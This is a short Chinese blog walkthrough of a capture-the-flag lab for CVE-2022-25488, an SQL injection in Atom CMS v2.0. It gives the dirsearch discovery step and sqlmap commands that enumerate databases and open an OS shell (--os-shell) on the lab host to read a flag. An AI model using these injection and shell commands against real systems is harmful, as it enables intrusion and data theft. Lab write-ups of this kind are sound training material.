首页后端开发JAVACVE-2022-25488

CVE-2022-25488

时间2023-10-21 14:53:03发布访客分类JAVA浏览1394
导读:简介Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。本人使用春秋云境免费靶场在线搭建。详解直接访问网址,跳转/home路径,而且报错。使用dirsear...

简介

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。

本人使用春秋云境免费靶场在线搭建。

详解

  1. 直接访问网址,跳转/home路径,而且报错。
  1. 使用dirsearch工具扫描路径,发现有个/admin/uploads.php路径。访问路径。
  1. 页面返回mysql报错信息,而且有个where id=,尝试参数id=1访问。
  1. id传过去了,而且没有mysql报错信息。尝试使用sqlmap注入。
  2. 使用SQLmap注入,id存在注入点。是报错注入和时间盲注。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 
  1. 查看所有数据库,发现没有flag数据库(一般flag都会存在flag数据库中)。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbs
  1. flag应该是在根目录下flag文件中,使用sqlmap获取shell。成功获取flag。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell

声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!


若转载请注明出处: CVE-2022-25488
本文地址: https://pptw.com/jishu/504573.html
CVE-2022-25099 PHP 热更新的简单程序

游客 回复需填写必要信息